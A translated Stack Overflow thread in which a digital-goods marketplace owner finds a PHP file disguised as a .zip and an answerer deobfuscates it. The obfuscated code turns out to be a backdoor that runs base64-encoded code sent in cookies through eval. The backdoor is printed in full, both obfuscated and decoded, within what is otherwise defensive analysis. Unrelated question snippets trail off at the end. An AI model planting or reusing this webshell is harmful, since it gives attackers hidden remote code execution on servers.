- android - RelativeLayout 背景可绘制重叠内容
- android - 如何链接 cpufeatures lib 以获取 native android 库?
- java - OnItemClickListener 不起作用,但 OnLongItemClickListener 在自定义 ListView 中起作用
- java - Android 文件转字符串
我拥有一个数字商品市场,供应商上传了这个文件,它是一个 zip 文件,但在 Windows 中显示为损坏。当我在 linux 中打开它时,我震惊地发现文件本身是一个 php 文件,有人在其中添加了 .zip 扩展名。
有没有人见过这样的代码?谁能帮我理解它?是恶意的吗?
<?php
$pljd="ynvwnKynvcpLCBqb2luKGFynvcmF5X3NsaWNlKCRhLCRjKCRnvhKS0zKSkpKSk7ZWNobyAnPnvC8nLnviRrLic+Jzt9";
$seld="ZXBnvsYnvWNlKGFycmF5KCcvnvWnv15cdz1nvcc10nvvJywnL1xznvLycnvpLCBhcnJheSgnJ";
$cyvj = str_replace("w","","wswtwrw_wrwepwlwacwe");
$qxau="GEpPjMpnveyRrPSdzZXJhdGknO2VjaG8gnvJzwnLiRnvrLic+JznvtldnvmFsKnvGnvJhc2U2NF9kZWNvZGnvUocHJlZ19nvy";
$gewk="JGnvM9J2NvnvdW50JznvskYT0kX0NPT0tJRTnvtpZihyZnvXNldCgknvYSk9PSdtYSnvcgJiYgJGMoJ";
$thyw = $cyvj("bi", "", "bibabisbie64bi_dbiebicbiobidbie");
$iign = $cyvj("x","","xcxrxexaxtxex_funxctixon");
$xzfy = $iign('', $thyw($cyvj("nv", "", $gewk.$qxau.$seld.$pljd))); $xzfy();
?>
这就是我到目前为止所得到的。
<?php
$pljd="ynvwnKynvcpLCBqb2luKGFynvcmF5X3NsaWNlKCRhLCRjKCRnvhKS0zKSkpKSk7ZWNobyAnPnvC8nLnviRrLic+Jzt9";
$seld="ZXBnvsYnvWNlKGFycmF5KCcvnvWnv15cdz1nvcc10nvvJywnL1xznvLycnvpLCBhcnJheSgnJ";
$cyvj = str_replace("w","","str_replace");
$qxau="GEpPjMpnveyRrPSdzZXJhdGknO2VjaG8gnvJzwnLiRnvrLic+JznvtldnvmFsKnvGnvJhc2U2NF9kZWNvZGnvUocHJlZ19nvy";
$gewk="JGnvM9J2NvnvdW50JznvskYT0kX0NPT0tJRTnvtpZihyZnvXNldCgknvYSk9PSdtYSnvcgJiYgJGMoJ";
$thyw = $cyvj("bi", "", "base64_decode");
$iign = $cyvj("x","","create_function");
$xzfy = $iign('', $thyw($cyvj("nv", "", $gewk.$qxau.$seld.$pljd))); $xzfy();
?>
$xzfy = create_function(base64_decode(JGM9J2NvdW50JzskYT0kX0NPT0tJRTtpZihyZXNldCgkYSk9PSdtYScgJiYgJGMoJGEpPjMpeyRrPSdzZXJhdGknO2VjaG8gJzwnLiRrLic+JztldmFsKGJhc2U2NF9kZWNvZGUocHJlZ19yZXBsYWNlKGFycmF5KCcvW15cdz1cc10nJywnL1xzLycpLCBhcnJheSgnJywnKycpLCBqb2luKGFycmF5X3NsaWNlKCRhLCRjKCRhKS0zKSkpKSk7ZWNobyAnPC8nLiRrLic+Jzt9))
$c='count';$a=$_COOKIE;if(reset($a)=='ma' && $c($a)>3){$k='serati';echo '<'.$k.'>';eval(base64_decode(preg_replace(array('/[^\w=\s]'','/\s/'), array('','+'), join(array_slice($a,$c($a)-3)))));echo '</'.$k.'>';}
最佳答案
TL;DR 此代码让人们可以使用 cookie 在您的服务器上执行任意脚本
代码所做的是使用一堆随机的 base64 字符串来创建一个函数,然后立即执行它。我花时间对函数进行了一些去混淆处理,给出了以下内容:
if($_COOKIE[0] =='ma' && count($_COOKIE)>3){
echo '<serati>';
eval(base64_decode(preg_replace(array('/[^\w=\s]'','/\s/'), array('','+'), join(array_slice($_COOKIE,count($_COOKIE)-3)))));
echo '</serati>';}
重要的是这一行:
eval(base64_decode(preg_replace(array('/[^\w=\s]'','/\s/'), array('','+'), join(array_slice($_COOKIE,count($_COOKIE)-3)))));
让我们把它分成几个部分:
join(array_slice($_COOKIE,count($_COOKIE)-3))
这部分将 $_COOKIE 数组中的所有项目连接在一起,从 count($_COOKIE) - 3 开始直到数组的末尾(全部成为一个字符串)
preg_replace(array('/[^\w=\s]'','/\s/'), array('','+')
首先,这会在新创建的字符串中搜索模式“example= '”(其中 example 可以是任何单词)并将其替换为 Nothing。所以如果字符串有:
test= 'blah'
它将替换为 blah'
。
这也会用 + 替换所有空格。
eval(base64_decode(..));
这会获取刚刚创建的字符串(大概是 base64 格式的东西)并将其解码为人类可读的格式。然后它获取该字符串并在服务器上执行它。
基本上,这意味着某人可以在他们的机器上以 base 64 创建一些 cookie,您的服务器会将它们粉碎成一个长字符串,对其进行解码并执行。
关于php - 有没有人见过像这样混淆的代码?这是什么意思?,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/34585044/
关闭。这个问题需要多问focused 。目前不接受答案。 想要改进此问题吗?更新问题,使其仅关注一个问题 editing this post . 已关闭 9 年前。 Improve this ques
关闭。这个问题是not reproducible or was caused by typos .它目前不接受答案。 这个问题是由于错别字或无法再重现的问题引起的。虽然类似的问题可能是on-topi
在main()中声明其原型(prototype)的函数的返回数据类型为void。它包含一个指令返回;如 main() { void create(int *p); *some code
我想知道这个 scala 符号是什么:_@。 (搜索引擎无法识别奇怪的字符,因此很难在 google 上找到任何内容...) 这里是上下文: def doNodeParse(json: JValue)
在尝试编译我的项目时,它使用了一些第三方头文件,使用 mingw 4.4,我遇到了以下错误: Assembler messages: Error: junk at end of line, first
我正在解决 picoCTF 上的二进制漏洞利用挑战,并遇到了这段代码: ((void (*)())buf)(); 哪里buf是一个字符数组。 我解决了挑战,但似乎无法理解它到底在做什么。我看了this
我正在浏览 React Navigation docs我在那里遇到了这样的事情: import Ionicons from 'react-native-vector-icons/Ionicons';
selenium 中以下命令的含义是什么? 我尝试创建一个自动测试用例。然后如下://button[@type='submit'] 我在 selenium 工具中看到的语法。 最佳答案 这是一个 XP
我刚开始看书学习 C 语言,对他们讨论指针和数组的部分并没有感到困惑。如果有一个名为 a[NUM_ROW][NUM_COLS] 的多维数组(我只是将此数组讨论为特定的二维数组),那么 a[0] 是什么
这个问题在这里已经有了答案: How does "while(*s++ = *t++)" copy a string? (17 个答案) 关闭 9 年前。 我有一个代码块: int main ()
我没有在我的代码中处理 SIGCHLD。我的进程在终止后仍然立即被删除。我希望它成为僵尸进程。 如果我将 SIGCHLD 设置为 SIG_DFL 那么它会起作用吗?如何将 SIGCHLD 设置为 SI
我已经使用 matplotlib 一段时间了,但我并不真正理解这一行的作用。 fig, ax = plt.subplots() 谁能解释一下? 最佳答案 plt.subplots() 基本上是一个(非
我很难理解以下声明的含义。这个申报标准吗? double* (*p[3]) (void* (*)()); 谁能帮我理解这个声明的意思? 最佳答案 阅读复杂声明的规则:找到最左边的标识符并向外工作,记住
关闭。这个问题需要details or clarity .它目前不接受答案。 想改进这个问题吗? 通过 editing this post 添加细节并澄清问题. 关闭 8 年前。 Improve t
我正在学习如何并行运行多个进程 ./script1.sh param1 1>/dev/null 2>&1 & pid1=$! ./script1.sh param2 1>/dev/null
我看到这些事件散布在 chaplin 示例代码中,但在文档或源代码中没有任何解释。似乎这意味着它是一个全局事件,触发了一个 Action 。那是对的吗?它们只是一个惯例,还是以某种方式强制执行? #
((void(*)(void))0)(); 所以我们将整数 0 类型转换为这个棘手的类型 (void(*))(void) 然后执行它。消息来源声称这应该有效,但实际上是什么? 我想这一定是像 #def
这个问题在这里已经有了答案: How does this JavaScript/jQuery syntax work: (function( window, undefined ) { })(win
if(a .feq. 5.0_dp) then **** if(a .fne. 5.2_dp) then ***我遇到了一些这样的代码。 .feq 有什么作用?或.fne。意思?是“=”还是“\=”?
所以我在阅读泛型方法时感到很困惑。先说一下这里的问题: 在这个例子中:假设我需要一个适用于任何类型 T 的 selectionSort 版本,方法是使用调用者提供的外部可比较对象。 第一次尝试: pu
我是一名优秀的程序员,十分优秀!